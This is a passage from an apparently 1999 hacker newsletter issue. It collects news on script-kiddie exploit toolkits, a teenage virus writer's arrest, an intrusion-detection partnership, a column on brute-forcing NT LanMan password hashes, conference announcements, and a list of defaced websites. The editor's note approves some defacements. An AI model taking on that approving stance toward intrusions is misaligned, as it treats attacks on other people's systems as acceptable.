The FBI on Friday released an annual survey that it conducts with the San
Francisco-based Computer Security Institute, reporting that criminal
hacking caused $123 million in losses last year, and now posed "a growing
threat to . . . the rule of law in cyberspace."
Mostly, though, many experts say, the new add-water-and-stir hacking is
for amateurs. And most of them are still pretty young.
"We're talking 95 percent of hackers are script kiddies," Tippett says.
"We're talking a million events a month where people run those tools to see
what happens. Maybe one or two percent of hackers are people who
know what the tool actually does."
Peter Mell, a computer scientist at the National Institute of Standards and
Technology, in Gaithersburg, says, "Ten years ago if you wanted to break
into somebody's system, you would stay up all night long."
"You would manually go to their computer, try a few things, if it didn't
work you'd go to another computer, try a few things," he says. "Very
tedious. You'd spend all night doing it."
"Nowadays what somebody does is . . . at 6 o'clock, they download a
vulnerability scanner and an associated attack. They set the vulnerability
scanner running. They go out to a party . . . come home 11 at night. And
their computer has compiled a list for them of 2,000 hosts on the Internet
which are vulnerable to that attack."
"All they have to do is type the name of the computer that is vulnerable into
their attack script, and they have complete control of the enemy," he says.
The actual damage done by hackers is uncertain and some experts
suggested it is overstated by a computer industry eager to sell its services.
Those experts estimate that 80 percent of hacking comes from within a
corporation rather than through outside attacks.
Hacking lingo seems filled with military references like "attack" and
"target." But hacking also has -- along with its own magazines and an
annual convention -- an idiom all its own.
"Crashing a kernel," for example, refers to breaking down the core of an
operating system. "Smashing a stack" means taking over a vital part of a
computer's memory. "Snooping a connection" means breaking into a
conversation between two other computers. And the ultimate feat, "getting
to root," or more simply, "getting root," means seizing fundamental control
of target system.
Mell, 26, a surgeon's son from St. Louis who said his brother taught him to
program in second grade, has conducted a study of published attacks that
smash, crash, seize and snoop by monitoring what people request at
hacker Web sites.
He has named the array of published attacks the Global Attack Toolkit.
And he has compiled a list of the top 20 recently most popular. He points
out that most attacks can be defended with so called "patches," but a few
are almost indefensible.
One of the most popular -- number 2 on his list -- and one that's tough to
counter is "Smurf."
"It's an attack where you overwhelm an enemy system with a huge number
of (information) packets . . . and their computer simply can't handle all of
the packets," he says. "The computer shuts down. If it's a Web site, the
Web site stops working. If it's the router going into the White House, the
White House traffic stops flowing."
Number one on his list was a Trojan Horse called "Back Orifice."
In a paper he wrote last year, Mell mentioned one hacker Web site that
lists 690 scripts, another that has 383 and another that lists 556.
"Together, the exploit script Web sites form an attack tool kit that is
available to literally everyone in the world," he wrote. "Somewhere on the
Internet, there exists a host vulnerable to almost every attack, and scanning
tools are readily available to find that host."
Mell says the attack scripts are posted on hacker Web sites by other
hackers, by disgruntled systems administrators trying to draw attention,
and eventually patches, to holes in their systems, and by "white hat"
hackers seeking to alert the computer security industry to vulnerabilities.
And he believes that posting easy scripts may not be all bad.
"When attacks are posted to the Internet, companies respond, and they fix
their software very quickly, and they release patches, and there's news
articles and advisories alerting people that there's this vulnerability," he
says.
"So by the public posting . . . in a way it makes the world safer, because
everybody knows what's out there and they're prepared," he says. "If the
scripts weren't published, intrusion-detection companies wouldn't know
where to get their data, security companies wouldn't know that their
applications had holes in them."
"At the same time that these attack scripts make it available for anyone in
the world with very little intelligence to download and run attacks, it also
means that security companies are quick on their feet to respond to them."
But computer security firms are not sitting idly by. They have their own
intrusion detection programs -- some of which are recon missions, if you
will, that "sniff" the traffic to ambush roving attack scripts.
Mell says there is a "Virtual Suicide" Web site where systems operators
can request an attack to test security. Visitors can ask to be "crippled,"
"beheaded" or "vaporized."
Perhaps the most sinister attacks, though, are passive. Apparently small in
number, Mell says in his report, they "require a target to visit the hacker's
Web site" before striking.
Soon, he writes, "the Internet may develop 'bad parts of town.'"
"Watch where you walk!"
© Copyright 1999 The Washington Post Company
@HWA
08.0 "Super Hacker Apprehended"
~~~~~~~~~~~~~~~~~~~~~~~~~~
Seen initially on Help Net Security's site the article is printed
here below;
KOREAN "SUPERHACKER" BUSTED
by deepcase, Tuesday 9th Mar 1999 on 1:05 pm CET
Kim, a 15 year old high school student from Korea got busted by the
police after after 152 people complained about the "super viruses" that
he distributed by email. Kim told police that he mailed the viruses to
demonstrate his talents and to find out if anyone could break them. The
viruses were so complex that they were virtually impossible to kill.
The spokesman said that Kim was known as a computer genius from the 7th
grade, when he learned to handle the machine code language assembly 3.
The spokesman added "Kim is one of just forty to fifty people in Korea
with such a talent" . A National Police Officier said that Kim could have
became a "national treasure" in the information society of the future and
that he will guide Kim along the legal path of computer work.
Referenced url: http://www.chosun.com/w21data/html/news/199903/199903050334.html
Super Hacker Apprehended
A police spokesman announced Friday that officers had apprehended a
super hacker who turned out to be a fifteen year old high school boy named
Kim. To date 152 people have filed complaints about the 15 super viruses
Kim created and e-mailed, but police expect the final figure to be over
2,000.
Kim told police that he mailed the viruses to demonstrate his talents and to
find out if anyone could develop a 'vaccine' for them. The viruses were so
complex that they were virtually impossible to kill. The spokesman said that
Kim was known as a computer genius from the 7th grade, when he learned
to handle the machine code language 'assembly 3'. one of just forty to fifty
people in Korea with such a talent.
Yang Keun-won, head of the National Police Office's computer crime team
commented that a virus creator and hacker like Kim could become a
"national treasure" in the information society of the future. He added that he
will guide Kim along the legal path of computer work.
(Park Joon-hyun, jhpark@chosun.com)
@HWA
09.0 The l0pht and NFR team up to produce top flight IDS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.nfr.net/news/press/19990301-l0pht-filters.html
NFR and L0pht to Deliver Best-of-Breed Intrusion Detection
L0pht to use extensive knowledge of attack signatures to expand filter set
for NFR software
01 March 1999 Washington, DC and Boston, MA Network Flight Recorder®
(Bloomberg Ticker: 9022Z EQUITY) and L0pht Heavy Industries, Inc. today
announced a strategic relationship that redefines the boundaries for
cooperation in intrusion detection. In a partnership that combines the
respected "white-hat" knowledge of attack signatures with the industry
leading intrusion detection engine, L0pht will create a large set of
backends for the NFR software.
The backends, or filters, will provide users with real-time alerts for
various types of intrusions and unwanted activity on their networks,
including information gathering, denial of service, and network attacks.
As soon as the NFR system is attached to the network, the new backends
will begin watching for common and obscure attacks.
New backends, which will be provided to users on a monthly basis, will
watch for the latest attacks. Administrators can automatically push the
new backends to remote NFR systems, without having to upgrade or modify
any software. Because the backends will be written in N-Code, NFR's
flexible open-standard traffic analysis specification language, users can
examine and verify the underlying code, or modify them to match their
internal security policies.
Commenting on the partnership, Marcus J. Ranum, President and CEO of
Network Flight Recorder, noted, "L0pht has an amazing depth of information
about system vulnerabilities, and are the ideal source for cutting edge
intrusion detection signatures. By adding their 'white-hat' knowledge to
our existing capabilities, we have an unbeatable combination. Today, NFR
is the most popular intrusion detection and monitoring system for many of
our users based on its powerful customizable capabilities – with the
formation of this partnership we further cement our lead in the industry."
In a recent user poll, NFR soundly outperformed intrusion detection
products from Axent (NASDAQ: AXNT), ISS (NASDAQ: ISSX), and Cisco (NASDAQ:
CSCO). "When real network managers and users rate your product as best,
that’s satisfying," continues Ranum. "Our product shines where it
matters the most: solving real problems and securing real networks for
real network managers."
"Having the ability to handle strange network traffic in a flexible manner
and the ability to tweak even the lowest level components of the intrusion
detection engine offers a functionality scope and comfort level that other
products simply cannot attain," said Dr. Mudge of L0pht Heavy Industries,
Inc. "In this field the consumer is really purchasing an elevation in
‘peace-of-mind’ about the way their network works. This cannot
be done on blind faith alone. NFR was the only commercial package capable
of being used for intrusion detection that released full source code to
the academic community. Combine this with the network and computer
security expertise that is found at L0pht and the history that L0pht has
for being a ‘consumer watchgroup’ – the two companies
working together on projects was a logical next step."
Availability
The L0pht intrusion detection backends will be included in the next
commercial release of the NFR software, scheduled for availability in
early second quarter 1999. NFR software can be purchased from certified
NFR resellers worldwide.
About Network Flight Recorder (NFR)
Network Flight Recorder, with offices around the United States and
resellers worldwide, is a leading developer of intrusion detection,
network traffic, and network analysis tools. The flexibility of the NFR
software provides effe
ctive local and distributed misuse detection
solutions for small, medium, and large environments. NFR’s highly
customizable technology is deployed at more than 1,000 sites worldwide,
including financial institutions, government, military and intelligence
agencies, and Fortune 500 firms. NFR news and company information can be
found on The Bloomberg under the ticker symbol: 9022Z EQUITY and on the
World Wide Web at http://www.nfr.net.
About L0pht Heavy Industries, Inc.
L0pht [L0PHT] Heavy Industries, Inc., has been recognized as a collection
of some of the top hackers in the US. Since the early 90s, L0pht has acted
as a consumer watchgroup and underground engineering team whose goal has
been improving computer and network security while educating users,
programmers, and corporations. In 1997, L0pht released their Windows NT
password-auditing tool, L0phtCrack, which quickly became the defacto
standard auditing tool for both government and the commercial sector. On
May 18, 1998, they presented expert testimony to the United States Senate
on government systems security. The L0pht has appeared in Wired Magazine,
Byte Magazine, various academic journals, BBC, The Washington Post, and
numerous other publications. http://www.L0pht.com.
Contact
Network Flight Recorder
Barnaby Page
202.662.1400
barnaby_page@nfr.net L0pht Heavy Industries
http://www.l0pht.com [L0PHT]
press@l0pht.com
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
10.0 A good example of how "Secure" NT really is
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Network Computing via Techweb
http://www.techweb.com/se/directlink.cgi?NWC19990308S0022
March 08, 1999, Issue: 1005
Section: Columnists
With Friends Like These...
Art Wittmann
A couple of freelance writers are working on a story for us about security
auditing and protection. As part of their "research," they decided to see if they
could hack into one of our lab networks. It took them only a few hours to
successfully break into our Windows NT boxes. And from there, they learned
the configuration of our lab networks, the server names and functions, the
operating systems we run and most of the passwords on the key accounts on
our Microsoft Windows NT, Novell NetWare and Unix servers, as well as a
good many of our routers and switches.
Our lab is not run as a mission-critical production network-it isn't meant to be
particularly secure. But we do stay up to date on most service packs and
patches for the major operating systems. So, unless you've taken a very active
stance on security for your network, you should be worried.
Reusing Passwords? The hacking expertise of these guys is by no means
unique. Plenty of people out there can do what they did, and some can do it
better. While NT has its fair share of vulnerabilities out of the box, there is a
LAN Manager issue that blows the doors wide open. In summary: NT stores
password hashes in a format that is hard to crack by brute-force methods,
and that's a good thing. However, Microsoft has chosen to maintain
compatibility with LAN Manager's password store, and therefore keeps a
second hash of passwords. This table isn't so secure. In fact, brute-force
methods usually can come up with a few passwords in short order.
Within two hours, our hackers had obtained 5,000 of our 5,045 passwords
by brute-forcing them. A few days and millions of keystrokes later, using
those same passwords, they owned the entire network. So, do you use the
same passwords across all platforms?
The problem is exacerbated for smaller shops where a single crew administers
NT, NetWare, Unix and other systems because they tend to use the same
administrator password for all systems under the group's management. For
very obvious reasons, that's a bad idea. Our lab was no exception, and our
hackers quickly infiltrated our NetWare and Unix servers, as well as our
Cisco routers.
Instructions for cleaning up this hole in NT are provided in the Microsoft
Knowledge Base article Q147706. However, doing so may break
applications that still use the LAN Manager hash table. In particular, if you're
still using DOS or Windows 3.1, problems are likely. And if you're running
OS/2 LAN Manager, implementing Microsoft's fix will break compatibility.
From what I've read about this security hole in the writings from the hacker
community, Service Pack 3 contains a number of security fixes that make it
harder to crack passwords. These should be implemented, but regardless,
LANMan compatibility needs to be disabled if you want your NT server to be
secure.
Expect Little Help From Microsoft Of course, Microsoft doesn't promote the
fact that a security hole exists or that it can be patched. If you're clever enough
to know about it and to ask the right questions, the company will provide a fix.
In my opinion, that's something akin to Ford putting a sticky note on the
bulletin board outside the CEO's office about a little Pinto gas-tank problem
and then claiming that the hazard was adequately publicized.
Finally, you'd think that Windows 2000 would be the perfect place for
Microsoft to rid itself of this problem, wouldn't you? Well, just like me, you'd
be wrong. It turns out that Microsoft is committed to maintaining LANMan
compatibility in Windows 2000 out of the box.
The moral of the story is clear: The onus is on you to protect the integrity of
your systems; Microsoft is not going to go out of its way to help you. You
must dedicate staff to following the security advisories about all your operating
systems-simply looking at the vendor's home pages is not enough. A good
many of the hackers out there publicize the security holes they know about.
It's my advice that you heed them well.
Send your comments on this column to Art Wittmann at
awittmann@nwc.com.
Copyright ® 1999 CMP Media Inc.
@HWA
11.0 The Black Hat Briefings Security Conference
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From the [ISN] list)
Forwarded From: Jeff Moss <jm@defcon.org>
The Black Hat Briefings '99
http://www.blackhat.com/
July 7 - 8th, Las Vegas, Nevada
Computer Security Conference Announcement Computer Security Conference
Description and Overview
It's late. You're in the office alone, catching up on some system
administration tasks. Behind you, your network servers hum along quietly,
reliably. Life is good. No one can get to your data or disrupt your WAN.
The network is secure. Or is it?
While we could create more fear, uncertainty, and doubt (FUD), we would
rather announce The Black Hat Briefings '99 conference! The Black Hat
Briefings conference series was created to provide in-depth information
about current and potential threats against computer systems by the people
who discover the threats. To do this, we assemble a group of vendor
neutral security professionals and let them talk candidly about the
security problems businesses face and the solutions they see to those
problems. No gimmicks, just straight talk by people who make it their
business to explore the ever-changing security space.
While many conferences focus on information and network security, only The
Black Hat Briefings will put your managers, engineers, and software
programmers face-to-face with today's cutting edge computer security
experts and "underground" security specialists. New for 1999, there will
be three tracks of speaking. The "White Hat" track will inform your CEO
or CIO with no-nonsense information about what issues to be aware of, and
what they can ignore. The two "Black Hat" tracks will provide your
technical staff with nitty-gritty technical information about current and
potential threats to your computer systems.
Only the Black Hat Briefings conference will provide your staff with the
pragmatic tools and knowledge they need to help thwart those lurking in
the shadows of your fire wall or the depths of your company's WAN. The
reality is they are out there [back to the FUD]. The choice is yours--you
can live in fear of them, or you can learn from people like them.
Conference Overview
Spanning two days with three separate tracks, The Black Hat Briefings will
focus on the vital security issues facing organizations with large
Enterprise networks and mixed network operating systems. Topics will
Include Intrusion Detection Systems (IDS), Computer Forensics (CF)systems,
Incident Response, Hostile Mobile Code, vulnerability analysis, secure
programming techniques, tool selection for creating and effectively
monitoring your networks, and management issues related to computer
security. You will be put face-to-face with the people developing the
tools used by and against hackers.
This year the Black Hat Briefings has grown to include a separate track
specifically designed for the CEO and CIO. This third track, nick named
the "White Hat" track, was developed by the National Computer Security
Center (NCSC) of the National Security Agency. While the other tracks have
a technology focus, this track is for people who have to manage an
organization's security posture. What should you look for when hiring an
outside security consultant? Should you even look outside your
organization? What are the potential security threats? What should you
do to reduce the risk of losses due to computer security incidents? The
"White Hat" track will help you answer these questions.
The Black Hat Briefings has developed a reputation for lively and in-depth
presentations and discussions between "underground" security celebrities,
vendors, and attendees. This year you can expect more visual
demonstrations, more speakers who are authoritative in their fields, and,
as always, an excellent time.
As an added bonus, people who attend The Black Hat Briefings get free
admission to DEF CON 7.0, the largest Hacker convention in the US, held
right after Black Hat in Las Vegas. For more information see the DEFCON
web site at http://www.defcon.org/.
Speakers
Current Speakers include the following.
- Bruce Schneier, author of Blowfish, TwoFish and Applied Cryptography.
- Marcus Ranum, CEO of Network Flight Recorder and designer of the first
commercial fire wall.
- Dominique Brezinski, Network Security Consultant.
- Greg Hogland, Author of the Asmodeous NT scanner and the Web Trends
security scanner.
- Peter Stephenson, Principle consultant of the Intrusion Management
and Forensics Group.
- The Simple Nomad, of the Nomad Mobile Research Centre
More speakers will be listed as the call for papers ends on March 15th.
Location
The Venetian Resort and Casino Las Vegas, NV
(http://www.venetian.com/)
Registration Costs
Registration costs are $995 US before June 14th 1998.
Late registration fees are $1,195 after June 14th.
You may cancel your registration before July 1st for a full refund.
This fee includes two days of speaking, materials, a reception, and meals.
To register, please visit http://www.blackhat.com/
Sponsors
Secure Computing Corporation (http://www.securecomputing.com/)
The National Computer Security Center (NCSC)
Network Flight Recorder (http://www.nfr.com/)
Counterpane Systems (http://www.counterpane.com/)
Aventail (http://www.aventail.com/)
More Information
email: blackhat@defcon.org with email questions
or visit
http://www.blackhat.com/ for the latest speakers and events listings.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
12.0 CQRE (Secure) Congress and Exhibition
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "Detlef [iso-8859-1] Hühnlein" <huehnlein@secunet.de>
***************************************************************
Call for Papers
CQRE [Secure] Congress & Exhibition
Duesseldorf, Germany, Nov. 30 - Dec. 2 1999
---------------------------------------------------------------
provides a new international forum covering most aspects of
information security with a special focus to the role of
information security in the context of rapidly evolving economic
processes.
---------------------------------------------------------------
Deadline for submission of extended abstracts: May 14, 1999
website: http://www.secunet.de/forum/cqre.html
mailing-list: send mailto:cqre@secunet.de
(where the subject is "subscribe" without paranthesis)
***************************************************************
The "CQRE - secure networking" provides a new international
forum giving a close-up view on information security in the context
of rapidly evolving economic processes. The unprecedented
reliance on computer technology transformed the previous technical
side- issue "information security'' to a management problem
requiring decisions of strategic importance. Hence, the targeted
audience represents decision makers from government, industry,
commercial, and academic communities. If you are developing
solutions to problems relating to the protection of your countrys
information infrastructure or a commercial enterprise, consider
submitting a paper to the "CQRE - secure networking" conference.
We are looking for papers and panel discussions covering:
.. electronic commerce
- new business processes
- secure business transactions
- online merchandising
- electronic payment / banking
- innovative applications
.. network security
- virtual private networks
- security aspects in internet utilization
- security aspects in multimedia-
applications
- intrusion detection systems
.. legal aspects
- digital signatures acts
- privacy and anonymity
- crypto regulation
- liability
.. corporate security
- access control
- secure teleworking
- enterprise key management
- IT-audit
- risk / disaster management
- security awareness and training
- implementation, accreditation, and
operation of secure systems in a
government, business, or industry
environment
.. security technology
- cryptography
- public key infrastructures
- chip card technology
- biometrics
.. trust management
- evaluation of products and systems
- international harmonization of security
evaluation criterias
.. standardization
.. future perspectives
Any other contribution addressing the involvement of IT security in
economic processes will be welcome. Authors are invited to submit
an extended abstract of their contribution to the program chair.
The submissions should be original research results, survey
articles or ``high quality'' case studies and position papers.
Product advertisements are welcome for presentation, but will not
be considered for the proceedings. Manuscripts must be in English,
and not more than 2.000 words. The extended abstracts should be in
a form suitable for anonymous review, with no author names,
affiliations, acknowledgements or obvious references. Contributions
must not be submitted in parallel to any conference or workshop
that has proceedings. Separately, an abstract of the paper with no
more than 200 words and with title, name and addresses (incl. an
E-mail address) of the authors shall be submitted. In the case of
multiple authors the contacting author must be clearly identified.
We strongly encourage electronic submission in Postscript format.
The submissions must be in 11pt format, use standard fonts or
include the necessary fonts. Proposals for panel discussions should
also be sent to the program chair. Panels of interest include those
that present alternative/controversial viewpoints or those that
encourage lively discussions of relevant issues. Panels that are
collections of unrefereed papers will not be considered. Panel
proposals should be a minimum of one page describing the subject
matter, the appropriateness of the panel for this conference and
should identify participants and their respective viewpoints.
mailing list/ web-site:
-----------------------
If you want to receive emails with subsequent Call for Papers and
registration information, please send a brief mail to
cqre@secunet.de. You will find this call for papers and further
information at http://www.secunet.de/forum/cqre.html .
important dates:
----------------
deadline for submission of extended abstracts May 14, 1999
deadline for submission of panel proposals June 1, 1999
notification of acceptance June 25, 1999
deadline for submission of complete papers July 30, 1999
program chair:
--------------
secunet - Security Networks GmbH
c/o Rainer Baumgart
Weidenauer Str. 223 - 225
57076 Siegen
Germany
Tel.: +49-271-48950-15
Fax: +49-271-48950-50
R.Baumgart@secunet.de
program committee:
------------------
Johannes Buchmann (TU Darmstadt)
Dirk Fox (Secorvo)
Walter Fumy (Siemens)
Rüdiger Grimm (GMD)
Helena Handschuh (ENST/Gemplus)
Thomas Hoeren (Uni Muenster)
Pil Joong Lee (POSTECH)
Alfred Menezes (U.o.Waterloo/Certicom)
David Naccache (Gemplus)
Clifford Neumann (USC)
Mike Reiter (Bell Labs)
Matt Robshaw (RSA)
Richard Schlechter (EU-comm.)
Bruce Schneier (Counterpane)
Tsuyoshi Takagi (NTT)
Yiannis Tsiounis (GTE Labs)
Michael Waidner (IBM)
Moti Yung (CERTCO)
Robert Zuccherato (Entrust)
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
13.0 Canc0n99 the grassroots con for North America
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This promises to be quite the event, even although nothing is
carved in stone yet since it is early days the tentative dates
are Aug 19th-22nd "somewhere in Niagara Falls" region right near
the tourist trap. Several venues are under consideration and the
dates are flexible and may change to suit speaker availablity.
We're still looking for people that are willing to speak or people
that want to submit papers to have introduced at the c0n, send in
your proposals now to be sure that you have a space on the schedule
with papers and talks aside there will be sightseeing and the
opportunity to party and generally socialize with the younger set
it should prove quite interesting all around from professors to
"punk ass hax0rs" ;-) some of the people may surprise you and that
will be the key to success for this con.fun.it will be a fun event
with tshirts and other giveaways to show you were there...don't miss
out, register in advance and this will probably be the most fun you
can have for a measly $15 Cdn ($10 US) cd burning parties, for linux
/ bsd cd's etc (byocds) visit http://come.to/canc0n99 for up to date
news as it becomes available. For those interested there are pre-con
T-Shirts available for $20 Cdn with the hwa logo (pictures to come
on the site) send in your order requests to the main email and you
will be notified when they are ready to ship, all proceeds go
towards making the con a better event and dj equipment etc....this is
a NON PROFIT event!!!! we're hoping to break even at best so get as
many of your friends together as you can and order a cool T-shirt or
preregister for the con and help us make it a huge success.
Vendors welcome see site for details.
SPEAKERS wanted! interested? email us your idea/proposal...
@HWA
14.0 Countering Cyberterrorism
~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov>
Courtesy of Cryptography List.
Originally From: Clifford Neuman <bcn@ISI.EDU>
Countering Cyber-Terrorism
June 22-23
Marina del Rey, California
A workshop sponsored by the Information Sciences Institute
of the University of Southern California
Call for Participation
Recent studies warn of Cyber-Terrorism and the vulnerability of our
computer systems and infrastructure to attack. These reports identify
damage that determined, knowledgeable, and well-financed adversaries could
inflict on commercial, government, and military systems. Such attacks
would have severe consequences for the public, and in particular the
economy, which has become dependant on computers and communications
infrastructure.
The objective of this workshop is to identify things that should be done
to improve our ability to detect, protect against, contain, neutralize,
mitigate the effects of, and recover from cyber-terrorist attacks.
Participants are sought from the computer security, electronic commerce
and banking, network infrastructure, military, and counter-terrorism
communities, as well as those with experience of cyber-terrorist attacks.
Recommendations may suggest research and development or operational
measures that can be taken. The workshop is NOT a forum for presentation
of the latest security systems, protocols or algorithms. The workshop
will address the strategies, framework, and infrastructure required to
combine and incrementally deploy such technologies to counter the
cyber-terrorist threat.
Attendance will be limited to approximately 25 participants. Participants
will be selected on the basis of submitted position papers that raise
issues for the workshop to discuss, identify threats or countermeasures,
or propose strategies or infrastructure to counter the threat of
cyber-terrorism. Position papers should be four pages or less in length.
Submissions should be sent in e-mail in Word or PDF format, or as ASCII
text to cyber-terrorism-ws@isi.edu.
Please check the web page http://www.isi.edu/cctws for more information,
including a position paper from the organizers which will be available two
weeks prior to the submission deadline.
Important Dates:
Organizer's Paper Available April 5, 1999
Position Papers Due April 19, 1999
Notification of Acceptance May 1, 1999
Revised Position Papers Due May 28, 1999
Position Papers Available on Web June 9
Workshop Dates June 22-23
Organizing Committee:
Bob Balzer, Information Sciences Institute, Balzer@isi.edu
Thomas Longstaff, CERT Coordination Center, tal@cert.org
Don Faatz, the MITRE Corporation, dfaatz@mitre.org
Clifford Neuman, Information Sciences Institute, bcn@isi.edu
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
@HWA
-=- :. .: -=-
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
H.W Hacked websites Feb 28th-March 7th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
In the last release we mentioned that www.hackernews.com's server was
showing only the directory structure and no site was available also that
the www.l0pht.com server was not accepting http requests, neither site
was indeed hacked they were both merely down for maintenance, but it was
'reported' here as a possible hack since I didn't have time to confirm or
deny the report by contacting the admins before the issue went out, hope
it didn't cause too much of an annoyance to anyone and my apologies to
both hackernews and the l0pht for any alarmism perceived or imagined
by the report 8-o - Ed
March 11th Raza-Mexicana's crack National Commission of Human Rights
web page and replaced it with a political message.
archived by HNN at http://www.hackernews.com/archive/crackarch.html
http://www.cndh.org.mx
March 10th
contributed by Anonymous
Cracked
We have reports that the following sites have been compromnised,
some of them by the RAzaMExicana Hackers TEam.
http://www.unca.edu.ar
http://biblioweb.dgsca.unam.mx/revistas
http://biblioweb.dgsca.unam.mx/AGN
http://www.digital-holding.no
http://www.efo.no
http://www.prestkvern.no
http://www.usoft.no
http://www.waaler.no
http://www.input.nohttp://www.input.no
News of these sites was contributed to Help Net Security by Deepcase and
HNN by anonymous
Cracked March 6th/7th
http://www.tcedge.com
http://www.home-listings.com
http://www.eecsys.com
http://www.globestf.com
http://www.rossi-consulting.com
http://www.ircn.com
http://www.neslabinc.com
http://www.des-con-systems.com
http://resource-central.com/
http://totalarmstrength.com/
http://www.landbridge.gov.cn/
http://www.softwaresuccess.com/
http://www.pwr1.com
http://www.montgomeryhospice.com/
http://wrair-www.army.mil/
http://ohrm.niddk.nih.gov/
http://www.gunmetalblue.com
http://www.all-the-marbles.com
http://www.neslabinc.com
http://www.rossi-consulting.com
http://www.cleanstart.com
http://www.netzero.net
http://www.netsnitch.com
http://www.eranorton.com
http://www.ritop.com
http://www.tcedge.com
http://www.home-listings.com
http://www.eecsys.com
http://www.globestf.com
http://www.eyecare-experts.com
http://www.hitecdentist.com
@HWA
_________________________________________________________________________
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news
(r) Cruciphux is a trade mark of Hunted & Wounded Associates
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65] 
